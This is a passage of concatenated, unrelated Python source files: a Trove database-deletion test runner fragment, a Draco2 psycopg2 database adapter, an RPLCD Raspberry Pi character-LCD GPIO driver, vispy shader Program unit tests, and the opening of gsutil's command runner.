self.instance_info.id, database_def['name'],
expected_http_code)
def assert_database_delete(
self,
instance_id,
database_name,
expected_http_code):
self.auth_client.databases.delete(instance_id, database_name)
self.assert_client_code(expected_http_code)
self._wait_for_database_delete(instance_id, database_name)
def _wait_for_database_delete(self, instance_id, deleted_database_name):
self.report.log("Waiting for deleted database to disappear from the "
"listing: %s" % deleted_database_name)
def _db_is_gone():
all_dbs = self._get_db_names(instance_id)
return deleted_database_name not in all_dbs
try:
poll_until(_db_is_gone, time_out=self.GUEST_CAST_WAIT_TIMEOUT_SEC)
self.report.log("Database is now gone from the instance.")
except exception.PollTimeOut:
self.fail("Database still listed after the poll timeout: %ds" %
self.GUEST_CAST_WAIT_TIMEOUT_SEC)
def run_nonexisting_database_delete(self, expected_http_code=202):
# Deleting a non-existing database is expected to succeed as if the
# database was deleted.
self.assert_database_delete(
self.instance_info.id, self.non_existing_db_def['name'],
expected_http_code)
def run_system_database_delete(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
# TODO(pmalik): Actions on system users and databases should probably
# return Forbidden 403 instead. The current error messages are
# confusing (talking about a malformed request).
system_databases = self.get_system_databases()
if system_databases:
for name in system_databases:
self.assert_database_delete_failure(
self.instance_info.id, name,
expected_exception, expected_http_code)
def assert_database_delete_failure(
self, instance_id, database_name,
expected_exception, expected_http_code):
self.assert_raises(expected_exception, expected_http_code,
self.auth_client.databases.delete,
instance_id, database_name)
def get_system_databases(self):
return self.get_datastore_config_property('ignore_dbs')
|
|
# vi: ts=8 sts=4 sw=4 et
#
# dbpsycopg2.py: psycopg2 database adapter
#
# This file is part of Draco2. Draco2 is free software and is made available
# under the MIT license. Consult the file "LICENSE" that is distributed
# together with this file for the exact licensing terms.
#
# Draco2 is copyright (c) 1999-2007 by the Draco2 authors. See the file
# "AUTHORS" for a complete overview.
#
# $Revision: 1187 $
import re
import decimal
import psycopg2
import psycopg2.extensions as ppgext
from draco2.database import *
from draco2.database.manager import DatabaseManager
from draco2.database.dialect import DatabaseDialect
ppgext.register_type(ppgext.UNICODE)
# This is really a horrible HACK.
#
# There are serious problems with the way mod_python uses multiple
# interpreters. The problems are such that one can ask whether mod_python and
# its use of multiple interpreters are fundamentally flawed and unfixable.
#
# See this these postings:
#
# - http://www.mail-archive.com/[email protected]/msg20175.html
# - http://mail.python.org/pipermail/python-list/2004-January/244343.html
#
# The summary is that extension modules are not really guaranteed to work as
# expected with multiple interpreters. For pure Python modules, each
# interpreter has a copy of that module. For C extension modules, there is one
# copy only that is shared between all interpreters. This means that extension
# modules cannot use global static variables.
#
# Psycopg caches the type of the "decimal" module for typecasting purposes.
# Because the decimal type is a pure python type, this means that this python
# type (which is specific to the interpreter that first loaded psycopg) will
# now be shared with other, non-related interpreters. This causes problems,
# one of them being that isinstance(decimal, object) will only work in the
# first interpreter.
#
# The horrible HACK we do here is to compile psycopg without support for the
# Decimal type, and we register our own pure Python type conversion routines.
# In these routines we re-import the decimal type (this appears to be
# necessary, though it is not entirely clear why) and return the _correct_
# decimal type for the
# current interpreter. Fortunately the other typecasting types used by
# psycopg are C types and therefore do not have this problem.
def cast_decimal(value, cursor):
"""SQL NUMERIC -> Python Decimal."""
if value is None:
return None
from decimal import Decimal # re-import!
value = Decimal(value)
return value
def adapt_decimal(object):
"""Python Decimal -> SQL."""
return ppgext.AsIs(object)
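# Note: 1700 is the PostgreSQL type OID for NUMERIC, so the registration
# below routes all NUMERIC columns through cast_decimal() above.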
NUMERIC = ppgext.new_type((1700,), 'NUMERIC', cast_decimal)
ppgext.register_type(NUMERIC)
ppgext.register_adapter(decimal.Decimal, adapt_decimal)
class Psycopg2DatabaseManager(DatabaseManager):
"""Psycopg2 database manager."""
name = 'psycopg2'
def __init__(self, dsn):
"""Constructor."""
super(Psycopg2DatabaseManager, self).__init__(dsn)
self.m_dialect = Psycopg2DatabaseDialect()
def _configure(self, config):
"""Configure using the Draco configuration file."""
super(Psycopg2DatabaseManager, self)._configure(config)
def dbapi(self):
"""Return the Python DB API."""
return psycopg2
def dialect(self):
"""Return a DatabaseDialect instance. """
return self.m_dialect
def dump_command(self, schema=None, output=None):
"""Return a command that will dump the contents of `schema'
to `output'.
If no schema is specified the entire database must be dumped. If
output is not specified, output should be written to standard
output.
"""
dsn = dict([i.split('=') for i in self.m_dsn.split()])
dbname = dsn.get('dbname')
if not dbname:
return
command = 'pg_dump --data-only'
if schema:
command += ' --schema=%s' % schema
if output:
command += ' --file=%s' % output
command += ' %s' % dbname
return command
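    # Illustrative example (hypothetical values): with a DSN of
    # 'dbname=draco user=draco', dump_command('public', '/tmp/draco.sql')
    # returns 'pg_dump --data-only --schema=public --file=/tmp/draco.sql draco'.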
def set_isolation_level(self, connection, level):
"""Set the isolation level of `connection' to `level'."""
dialect = self.dialect()
if not dialect.is_isolation_level(level):
m = 'Unknown transaction isolation level: %s'
            raise ValueError(m % level)
level = dialect.isolation_levels[level]
connection.set_isolation_level(level)
def set_client_encoding(self, connection, encoding):
"""Set the client encoding on the connection to `encoding'."""
dialect = self.dialect()
if not dialect.is_encoding(encoding):
m = 'Unknown client encoding: %s'
            raise ValueError(m % encoding)
connection.set_client_encoding(encoding)
def is_serialization_error(self, exception):
"""Return True if `exception' is a serialization error."""
# This is a HACK but there's no other way.
err = str(exception)
return err.startswith('could not serialize access') or \
err.startswith('deadlock detected')
def serialization_error(self):
"""Return an instance of a serialization error."""
err = DatabaseDBAPIError('could not serialize access')
return err
def is_primary_key_error(self, exception):
"""Return True if `exception' is a primary key error."""
err = str(exception)
return err.startswith('duplicate key violates')
def primary_key_error(self):
"""Return an instance of a primary key error."""
err = DatabaseDBAPIError('duplicate key violates')
return err
def _connect(self):
"""Create a new database connection."""
dbapi = self.dbapi()
try:
connection = dbapi.connect(dsn=self.m_dsn)
connection.set_client_encoding('UNICODE')
        except dbapi.Error as err:
            raise DatabaseInterfaceError(str(err))
return connection
class Psycopg2DatabaseDialect(DatabaseDialect):
"""A database dialect for Psycopg2/PostgreSQL."""
keywords = \
set((
'ALL', 'AND', 'ANY', 'AS', 'ASC', 'AUTHORIZATION',
'BETWEEN', 'BOTH', 'CASE', 'CAST', 'CHECK', 'COLLATE', 'COLUMN',
'CONSTRAINT', 'CREATE', 'CROSS', 'CURRENT_DATE', 'CURRENT_TIME',
'CURRENT_TIMESTAMP', 'CURRENT_USER', 'DEFAULT', 'DEFERRABLE',
'DESC', 'DISTINCT', 'ELSE', 'END', 'EXCEPT', 'FALSE', 'FOR',
'FOREIGN', 'FROM', 'FULL', 'GRANT', 'GROUP', 'HAVING', 'IN',
'INITIALLY', 'INNER', 'INTERSECT', 'INTO', 'IS', 'JOIN',
'LEADING', 'LEFT', 'LIKE', 'NATURAL', 'NOT', 'NULL', 'ON',
'ONLY', 'OR', 'ORDER', 'OUTER', 'OVERLAPS', 'PRIMARY',
'REFERENCES', 'RIGHT', 'SELECT', 'SESSION_USER', 'SOME',
'TABLE', 'THEN', 'TO', 'TRAILING', 'TRUE', 'UNION', 'UNIQUE',
'USER', 'USING', 'WHEN', 'WHERE'
))
isolation_levels = \
{
'READ UNCOMMITTED': ppgext.ISOLATION_LEVEL_READ_UNCOMMITTED,
'READ COMMITTED': ppgext.ISOLATION_LEVEL_READ_COMMITTED,
'REPEATABLE READ': ppgext.ISOLATION_LEVEL_REPEATABLE_READ,
'SERIALIZABLE': ppgext.ISOLATION_LEVEL_SERIALIZABLE
}
encodings = \
set((
'SQL_ASCII', 'EUC_JP', 'EUC_CN', 'EUC_KR', 'JOHAB', 'EUC_TW',
'UNICODE', 'MULE_INTERNAL', 'LATIN1', 'LATIN2', 'LATIN3', 'LATIN4',
'LATIN5', 'LATIN6', 'LATIN7', 'LATIN8', 'LATIN9', 'LATIN10',
'ISO_8859_5', 'ISO_8859_6', 'ISO_8859_7', 'ISO_8859_8', 'KOI8',
'WIN', 'ALT', 'WIN1256', 'TCVN', 'WIN874'
))
    re_blob = re.compile(r'\s(BLOB|BINARY LARGE OBJECT)\s', re.I)
def translate(self, query):
head = query[:30].lstrip().upper()
if head.startswith('CREATE TABLE'):
query = self.re_blob.sub(' BYTEA ', query)
return query
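    # Illustrative example: translate() only rewrites CREATE TABLE statements,
    # e.g. 'CREATE TABLE t (data BLOB )' -> 'CREATE TABLE t (data BYTEA )',
    # and returns any other query unchanged.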
|
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013-2018 Danilo Bargen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function, division, absolute_import, unicode_literals
from collections import namedtuple
import RPi.GPIO as GPIO
from . import common as c
from .lcd import BaseCharLCD
from .compat import range
PinConfig = namedtuple('PinConfig', 'rs rw e d0 d1 d2 d3 d4 d5 d6 d7 backlight mode')
class CharLCD(BaseCharLCD):
def __init__(self, numbering_mode=None, pin_rs=None, pin_rw=None, pin_e=None, pins_data=None,
pin_backlight=None, backlight_mode='active_low',
backlight_enabled=True,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True):
"""
Character LCD controller.
The default pin numbers are based on the BOARD numbering scheme (1-26).
You can save 1 pin by not using RW. Set ``pin_rw`` to ``None`` if you
want this.
:param pin_rs: Pin for register select (RS). Default: ``15``.
:type pin_rs: int
:param pin_rw: Pin for selecting read or write mode (R/W). Set this to
``None`` for read only mode. Default: ``18``.
:type pin_rw: int
:param pin_e: Pin to start data read or write (E). Default: ``16``.
:type pin_e: int
:param pins_data: List of data bus pins in 8 bit mode (DB0-DB7) or in 4
bit mode (DB4-DB7) in ascending order. Default: ``[21, 22, 23, 24]``.
:type pins_data: list of int
:param pin_backlight: Pin for controlling backlight on/off. Set this to
``None`` for no backlight control. Default: ``None``.
:type pin_backlight: int
:param backlight_mode: Set this to either ``active_high`` or ``active_low``
to configure the operating control for the backlight. Has no effect if
pin_backlight is ``None``
:type backlight_mode: str
:param backlight_enabled: Whether the backlight is enabled initially.
Default: ``True``. Has no effect if pin_backlight is ``None``
:type backlight_enabled: bool
:param numbering_mode: Which scheme to use for numbering of the GPIO pins,
either ``GPIO.BOARD`` or ``GPIO.BCM``. Default: ``GPIO.BOARD`` (1-26).
:type numbering_mode: int
:param rows: Number of display rows (usually 1, 2 or 4). Default: ``4``.
:type rows: int
:param cols: Number of columns per row (usually 16 or 20). Default ``20``.
:type cols: int
:param dotsize: Some 1 line displays allow a font height of 10px.
Allowed: ``8`` or ``10``. Default: ``8``.
:type dotsize: int
:param charmap: The character map used. Depends on your LCD. This must
be either ``A00`` or ``A02``. Default: ``A02``.
:type charmap: str
:param auto_linebreaks: Whether or not to automatically insert line
breaks. Default: ``True``.
:type auto_linebreaks: bool
"""
# Set attributes
if numbering_mode == GPIO.BCM or numbering_mode == GPIO.BOARD:
self.numbering_mode = numbering_mode
else:
raise ValueError('Invalid GPIO numbering mode: numbering_mode=%s, '
'must be either GPIO.BOARD or GPIO.BCM.\n'
'See https://gist.github.com/dbrgn/77d984a822bfc9fddc844f67016d0f7e '
'for more details.' % numbering_mode)
if pin_rs is None:
raise ValueError('pin_rs is not defined.')
if pin_e is None:
raise ValueError('pin_e is not defined.')
if len(pins_data) == 4: # 4 bit mode
self.data_bus_mode = c.LCD_4BITMODE
block1 = [None] * 4
elif len(pins_data) == 8: # 8 bit mode
self.data_bus_mode = c.LCD_8BITMODE
block1 = pins_data[:4]
else:
raise ValueError('There should be exactly 4 or 8 data pins.')
block2 = pins_data[-4:]
self.pins = PinConfig(rs=pin_rs, rw=pin_rw, e=pin_e,
d0=block1[0], d1=block1[1], d2=block1[2], d3=block1[3],
d4=block2[0], d5=block2[1], d6=block2[2], d7=block2[3],
backlight=pin_backlight,
mode=numbering_mode)
self.backlight_mode = backlight_mode
# Call superclass
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
# Set backlight status
if pin_backlight is not None:
self.backlight_enabled = backlight_enabled
def _init_connection(self):
# Setup GPIO
GPIO.setmode(self.numbering_mode)
for pin in list(filter(None, self.pins))[:-1]:
GPIO.setup(pin, GPIO.OUT)
if self.pins.backlight is not None:
GPIO.setup(self.pins.backlight, GPIO.OUT)
# Initialization
c.msleep(50)
GPIO.output(self.pins.rs, 0)
GPIO.output(self.pins.e, 0)
if self.pins.rw is not None:
GPIO.output(self.pins.rw, 0)
def _close_connection(self):
pins = (self.pins.rs, self.pins.rw, self.pins.e, self.pins.d0, self.pins.d1,
self.pins.d2, self.pins.d3, self.pins.d4, self.pins.d5, self.pins.d6,
self.pins.d7)
active_pins = [pin for pin in pins if pin is not None]
GPIO.cleanup(active_pins)
# Properties
def _get_backlight_enabled(self):
# We could probably read the current GPIO output state via sysfs, but
# for now let's just store the state in the class
if self.pins.backlight is None:
raise ValueError('You did not configure a GPIO pin for backlight control!')
return bool(self._backlight_enabled)
def _set_backlight_enabled(self, value):
if self.pins.backlight is None:
raise ValueError('You did not configure a GPIO pin for backlight control!')
if not isinstance(value, bool):
raise ValueError('backlight_enabled must be set to ``True`` or ``False``.')
self._backlight_enabled = value
GPIO.output(self.pins.backlight,
value ^ (self.backlight_mode == 'active_low'))
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to turn on the backlight.')
# Low level commands
def _send(self, value, mode):
"""Send the specified value to the display with automatic 4bit / 8bit
        selection. The ``mode`` argument is either ``RS_DATA`` or ``RS_INSTRUCTION``."""
# Choose instruction or data mode
GPIO.output(self.pins.rs, mode)
# If the RW pin is used, set it to low in order to write.
if self.pins.rw is not None:
GPIO.output(self.pins.rw, 0)
# Write data out in chunks of 4 or 8 bit
if self.data_bus_mode == c.LCD_8BITMODE:
self._write8bits(value)
else:
self._write4bits(value >> 4)
self._write4bits(value)
def _send_data(self, value):
"""Send data to the display. """
self._send(value, c.RS_DATA)
def _send_instruction(self, value):
"""Send instruction to the display. """
self._send(value, c.RS_INSTRUCTION)
def _write4bits(self, value):
"""Write 4 bits of data into the data bus."""
for i in range(4):
bit = (value >> i) & 0x01
GPIO.output(self.pins[i + 7], bit)
self._pulse_enable()
def _write8bits(self, value):
"""Write 8 bits of data into the data bus."""
for i in range(8):
bit = (value >> i) & 0x01
GPIO.output(self.pins[i + 3], bit)
self._pulse_enable()
def _pulse_enable(self):
"""Pulse the `enable` flag to process data."""
GPIO.output(self.pins.e, 0)
c.usleep(1)
GPIO.output(self.pins.e, 1)
c.usleep(1)
GPIO.output(self.pins.e, 0)
c.usleep(100) # commands need > 37us to settle
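# Minimal usage sketch (hypothetical wiring; the pin numbers below are
# placeholders for BOARD-mode wiring and must match your own setup):
#
#   import RPi.GPIO as GPIO
#   lcd = CharLCD(numbering_mode=GPIO.BOARD, pin_rs=15, pin_e=16,
#                 pins_data=[21, 22, 23, 24], cols=20, rows=4)
#   lcd.write_string('Hello world')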
|
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All rights reserved.
# Distributed under the terms of the new BSD License.
# -----------------------------------------------------------------------------
import unittest
import numpy as np
from vispy import gloo, app
from vispy.gloo.program import Program
from vispy.testing import run_tests_if_main, assert_in, requires_application
from vispy.gloo.context import set_current_canvas, forget_canvas
class DummyParser(gloo.glir.BaseGlirParser):
def convert_shaders(self):
return 'desktop'
def parse(self, commands):
pass
class DummyCanvas:
def __init__(self):
self.context = gloo.context.GLContext()
self.context.shared.parser = DummyParser()
self.context.glir.flush = lambda *args: None # No flush
class ProgramTest(unittest.TestCase):
def test_init(self):
# Test ok init, no shaders
program = Program()
assert program._user_variables == {}
assert program._code_variables == {}
assert program._pending_variables == {}
assert program.shaders == ('', '')
# Test ok init, with shader
program = Program('A', 'B')
assert program.shaders == ('A', 'B')
# False inits
self.assertRaises(ValueError, Program, 'A', None)
self.assertRaises(ValueError, Program, None, 'B')
self.assertRaises(ValueError, Program, 3, 'B')
self.assertRaises(ValueError, Program, 3, None)
self.assertRaises(ValueError, Program, 'A', 3)
self.assertRaises(ValueError, Program, None, 3)
self.assertRaises(ValueError, Program, "", "")
self.assertRaises(ValueError, Program, "foo", "")
self.assertRaises(ValueError, Program, "", "foo")
def test_setting_shaders(self):
program = Program("A", "B")
assert program.shaders[0] == "A"
assert program.shaders[1] == "B"
program.set_shaders('C', 'D')
assert program.shaders[0] == "C"
assert program.shaders[1] == "D"
@requires_application()
def test_error(self):
vert = '''
void main() {
vec2 xy;
error on this line
vec2 ab;
}
'''
frag = 'void main() { glFragColor = vec4(1, 1, 1, 1); }'
with app.Canvas() as c:
program = Program(vert, frag)
try:
program._glir.flush(c.context.shared.parser)
except Exception as err:
assert_in('error on this line', str(err))
else:
raise Exception("Compile program should have failed.")
def test_uniform(self):
        # Test array uniforms
program = Program("uniform float A[10];", "foo")
assert ('uniform_array', 'float', 'A') in program.variables
assert len(program.variables) == 11 # array plus elements
self.assertRaises(ValueError, program.__setitem__, 'A',
np.ones((9, 1)))
program['A'] = np.ones((10, 1))
program['A[0]'] = 0
assert 'A[0]' in program._user_variables
assert 'A[0]' not in program._pending_variables
# Init program
program = Program("uniform float A;",
"uniform float A; uniform vec4 B;")
assert ('uniform', 'float', 'A') in program.variables
assert ('uniform', 'vec4', 'B') in program.variables
assert len(program.variables) == 2
# Set existing uniforms
program['A'] = 3.0
assert isinstance(program['A'], np.ndarray)
assert program['A'] == 3.0
assert 'A' in program._user_variables
#
program['B'] = 1.0, 2.0, 3.0, 4.0
assert isinstance(program['B'], np.ndarray)
assert all(program['B'] == np.array((1.0, 2.0, 3.0, 4.0), np.float32))
assert 'B' in program._user_variables
# Set non-existent uniforms
program['C'] = 1.0, 2.0
assert program['C'] == (1.0, 2.0)
assert 'C' not in program._user_variables
assert 'C' in program._pending_variables
# Set samplers
program.set_shaders("""uniform sampler1D T1;
uniform sampler2D T2;
uniform sampler3D T3;""", "f")
program['T1'] = np.zeros((10, ), np.float32)
program['T2'] = np.zeros((10, 10), np.float32)
program['T3'] = np.zeros((10, 10, 10), np.float32)
assert isinstance(program['T1'], gloo.Texture1D)
assert isinstance(program['T2'], gloo.Texture2D)
assert isinstance(program['T3'], gloo.Texture3D)
# Set samplers with textures
tex = gloo.Texture2D((10, 10))
program['T2'] = tex
assert program['T2'] is tex
program['T2'] = np.zeros((10, 10), np.float32) # Update texture
assert program['T2'] is tex
# C should be taken up when code comes along that mentions it
program.set_shaders("uniform float A; uniform vec2 C;",
"uniform float A; uniform vec4 B;")
assert isinstance(program['C'], np.ndarray)
assert all(program['C'] == np.array((1.0, 2.0), np.float32))
assert 'C' in program._user_variables
assert 'C' not in program._pending_variables
# Set wrong values
self.assertRaises(ValueError, program.__setitem__, 'A', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'B', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'C', 1.0)
# Set wrong values beforehand
program['D'] = 1.0, 2.0
self.assertRaises(ValueError, program.set_shaders,
'', 'uniform vec3 D;')
def test_attributes(self):
program = Program("attribute float A; attribute vec4 B;", "foo")
assert ('attribute', 'float', 'A') in program.variables
assert ('attribute', 'vec4', 'B') in program.variables
assert len(program.variables) == 2
from vispy.gloo import VertexBuffer
vbo = VertexBuffer()
# Set existing uniforms
program['A'] = vbo
assert program['A'] == vbo
assert 'A' in program._user_variables
assert program._user_variables['A'] is vbo
        # Set data - update existing vbo
program['A'] = np.zeros((10,), np.float32)
assert program._user_variables['A'] is vbo
# Set data - create new vbo
program['B'] = np.zeros((10, 4), np.float32)
assert isinstance(program._user_variables['B'], VertexBuffer)
# Set non-existent uniforms
vbo = VertexBuffer() # new one since old one is now wrong size
program['C'] = vbo
assert program['C'] == vbo
assert 'C' not in program._user_variables
assert 'C' in program._pending_variables
# C should be taken up when code comes along that mentions it
program.set_shaders("attribute float A; attribute vec2 C;", "foo")
assert program['C'] == vbo
assert 'C' in program._user_variables
assert 'C' not in program._pending_variables
# Set wrong values
self.assertRaises(ValueError, program.__setitem__, 'A', 'asddas')
# Set wrong values beforehand
program['D'] = ""
self.assertRaises(ValueError, program.set_shaders,
'attribute vec3 D;', '')
# Set to one value per vertex
program.set_shaders("attribute float A; attribute vec2 C;", "foo")
program['A'] = 1.0
assert program['A'] == 1.0
program['C'] = 1.0, 2.0
assert all(program['C'] == np.array((1.0, 2.0), np.float32))
#
self.assertRaises(ValueError, program.__setitem__, 'A', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'C', 1.0)
self.assertRaises(ValueError, program.bind, 'notavertexbuffer')
program = Program("attribute vec2 C;", "foo")
        # first code path: no existing variable
self.assertRaises(ValueError, program.__setitem__, 'C',
np.ones((2, 10), np.float32))
# second code path: variable exists (VertexBuffer.set_data)
program['C'] = np.ones((10, 2), np.float32)
self.assertRaises(ValueError, program.__setitem__, 'C',
np.ones((2, 10), np.float32))
def test_vbo(self):
# Test with count
program = Program('attribute float a; attribute vec2 b;', 'foo', 10)
assert program._count == 10
assert ('attribute', 'float', 'a') in program.variables
assert ('attribute', 'vec2', 'b') in program.variables
# Set
program['a'] = np.ones((10,), np.float32)
assert np.all(program._buffer['a'] == 1)
def test_varyings(self):
# Varyings and constants are detected
program = Program("varying float A; const vec4 B;", "foo")
assert ('varying', 'float', 'A') in program.variables
assert ('const', 'vec4', 'B') in program.variables
# But cannot be set
self.assertRaises(KeyError, program.__setitem__, 'A', 3.0)
self.assertRaises(KeyError, program.__setitem__, 'B', (1.0, 2.0, 3.0))
# And anything else also fails
self.assertRaises(KeyError, program.__getitem__, 'fooo')
def test_draw(self):
# Init
program = Program("attribute float A;", "uniform float foo")
program['A'] = np.zeros((10,), np.float32)
dummy_canvas = DummyCanvas()
glir = dummy_canvas.context.glir
set_current_canvas(dummy_canvas)
try:
# Draw arrays
program.draw('triangles')
glir_cmd = glir.clear()[-1]
assert glir_cmd[0] == 'DRAW'
assert len(glir_cmd[-1]) == 2
# Draw elements
indices = gloo.IndexBuffer(np.zeros(10, dtype=np.uint8))
program.draw('triangles', indices)
glir_cmd = glir.clear()[-1]
assert glir_cmd[0] == 'DRAW'
assert len(glir_cmd[-1]) == 3
# Invalid mode
self.assertRaises(ValueError, program.draw, 'nogeometricshape')
# Invalid index
self.assertRaises(TypeError, program.draw, 'triangles', 'notindex')
            # No attributes
program = Program("attribute float A;", "uniform float foo")
self.assertRaises(RuntimeError, program.draw, 'triangles')
            # Attributes with different sizes
program = Program("attribute float A; attribute float B;", "foo")
program['A'] = np.zeros((10,), np.float32)
program['B'] = np.zeros((11,), np.float32)
self.assertRaises(RuntimeError, program.draw, 'triangles')
finally:
forget_canvas(dummy_canvas)
run_tests_if_main()
|
|
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class that runs a named gsutil command."""
from __future__ import absolute_import
import difflib
import logging
import os
import pkgutil
import sys
import textwrap
import time
import boto
from boto.storage_uri import BucketStorageUri
import gslib
from gslib.cloud_api_delegator import CloudApiDelegator
from gslib.command import Command
from gslib.command import CreateGsutilLogger
from gslib.command import GetFailureCount
from gslib.command import OLD_ALIAS_MAP
from gslib.command import ShutDownGsutil
import gslib.commands
from gslib.cs_api_map import ApiSelector
from gslib.cs_api_map import GsutilApiClassMapFactory
from gslib.cs_api_map import GsutilApiMapFactory
from gslib.exception import CommandException
from gslib.gcs_json_api import GcsJsonApi
from gslib.no_op_credentials import NoOpCredentials
from gslib.tab_complete import MakeCompleter
from gslib.util import CompareVersions
from gslib.util import GetGsutilVersionModifiedTime
from gslib.util import GSUTIL_PUB_TARBALL
from gslib.util import IsRunningInteractively
from gslib.util import LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE
from gslib.util import LookUpGsutilVersion
from gslib.util import MultiprocessingIsAvailable
from gslib.util import RELEASE_NOTES_URL
from gslib.util import SECONDS_PER_DAY
from gslib.util import UTF8
def HandleArgCoding(args):
"""Handles coding of command-line args.
Args:
args: array of command-line args.
Returns:
array of command-line args.
Raises:
CommandException: if errors encountered.
"""
# Python passes arguments from the command line as byte strings. To
# correctly interpret them, we decode ones other than -h and -p args (which
# will be passed as headers, and thus per HTTP spec should not be encoded) as
# utf-8. The exception is x-goog-meta-* headers, which are allowed to contain
# non-ASCII content (and hence, should be decoded), per
# https://developers.google.com/storage/docs/gsutil/addlhelp/WorkingWithObjectMetadata
processing_header = False
for i in range(len(args)):
arg = args[i]
# Commands like mv can run this function twice; don't decode twice.
try:
decoded = arg if isinstance(arg, unicode) else arg.decode(UTF8)
except UnicodeDecodeError:
raise CommandException('\n'.join(textwrap.wrap(
'Invalid encoding for argument (%s). Arguments must be decodable as '
'Unicode. NOTE: the argument printed above replaces the problematic '
'characters with a hex-encoded printable representation. For more '
'details (including how to convert to a gsutil-compatible encoding) '
'see `gsutil help encoding`.' % repr(arg))))
if processing_header:
if arg.lower().startswith('x-goog-meta'):
args[i] = decoded
else:
try:
# Try to encode as ASCII to check for invalid header values (which
# can't be sent over HTTP).
decoded.encode('ascii')
except UnicodeEncodeError:
# Raise the CommandException using the decoded value because
# _OutputAndExit function re-encodes at the end.
raise CommandException(
'Invalid non-ASCII header value (%s).\nOnly ASCII characters are '
'allowed in headers other than x-goog-meta- headers' % decoded)
else:
args[i] = decoded
processing_header = (arg in ('-h', '-p'))
return args
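# Illustrative sketch (hypothetical args): for
#   args = ['-h', 'x-goog-meta-note:caf\xc3\xa9', 'cp', 'src', 'gs://bucket']
# the x-goog-meta-* header value is decoded from UTF-8, whereas a non-ASCII
# value for any other header would raise a CommandException.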
class CommandRunner(object):
"""Runs gsutil commands and does some top-level argument handling."""
def __init__(self, bucket_storage_uri_class=BucketStorageUri,
gsutil_api_class_map_factory=GsutilApiClassMapFactory,
command_map=None):
"""Instantiates a CommandRunner.
Args:
bucket_storage_uri_class: Class to instantiate for cloud StorageUris.
Settable for testing/mocking.
gsutil_api_class_map_factory: Creates map of cloud storage interfaces.
Settable for testing/mocking.
command_map: Map of command names to their implementations for
testing/mocking. If not set, the map is built dynamically.
"""
self.bucket_storage_uri_class = bucket_storage_uri_class
self.gsutil_api_class_map_factory = gsutil_api_class_map_factory
if command_map:
self.command_map = command_map
else:
self.command_map = self._LoadCommandMap()
def _LoadCommandMap(self):
"""Returns dict mapping each command_name to implementing class."""
# Import all gslib.commands submodules.
for _, module_name, _ in pkgutil.iter_modules(gslib.commands.__path__):
__import__('gslib.commands.%s' % module_name)
command_map = {}
# Only include Command subclasses in the dict.
for command in Command.__subclasses__():
command_map[command.command_spec.command_name] = command
for command_name_aliases in command.command_spec.command_name_aliases:
command_map[command_name_aliases] = command
return command_map
def _ConfigureCommandArgumentParserArguments(
self, parser, arguments, gsutil_api):
"""Configures an argument parser with the given arguments.
Args:
parser: argparse parser object.
arguments: array of CommandArgument objects.
gsutil_api: gsutil Cloud API instance to use.
Raises:
RuntimeError: if argument is configured with unsupported completer
"""
for command_argument in arguments:
action = parser.add_argument(
*command_argument.args, **command_argument.kwargs)
if command_argument.completer:
action.completer = MakeCompleter(command_argument.completer, gsutil_api)
def ConfigureCommandArgumentParsers(self, subparsers):
"""Configures argparse arguments and argcomplete completers for commands.
Args:
subparsers: argparse object that can be used to add parsers for
subcommands (called just 'commands' in gsutil)
"""
# This should match the support map for the "ls" command.
support_map = {
'gs': [ApiSelector.XML, ApiSelector.JSON],
's3': [ApiSelector.XML]
}
default_map = {
'gs': ApiSelector.JSON,
's3': ApiSelector.XML
}
gsutil_api_map = GsutilApiMapFactory.GetApiMap(
self.gsutil_api_class_map_factory, support_map, default_map)
logger = CreateGsutilLogger('tab_complete')
gsutil_api = CloudApiDelegator(
self.bucket_storage_uri_class, gsutil_api_map,
logger, debug=0)
for command in set(self.command_map.values()):
command_parser = subparsers.add_parser(
command.command_spec.command_name, add_help=False)
if isinstance(command.command_spec.argparse_arguments, dict):
subcommand_parsers = command_parser.add_subparsers()
subcommand_argument_dict = command.command_spec.argparse_arguments
for subcommand, arguments in subcommand_argument_dict.iteritems():
subcommand_parser = subcommand_parsers.add_parser(
subcommand, add_help=False)
self._ConfigureCommandArgumentParserArguments(
subcommand_parser, arguments, gsutil_api)
else:
self._ConfigureCommandArgumentParserArguments(
command_parser, command.command_spec.argparse_arguments, gsutil_api)
def RunNamedCommand(self, command_name, args=None, headers=None, debug=0,
parallel_operations=False, test_method=None,
skip_update_check=False, logging_filters=None,
do_shutdown=True):
"""Runs the named command.
Used by gsutil main, commands built atop other commands, and tests.
Args:
command_name: The name of the command being run.
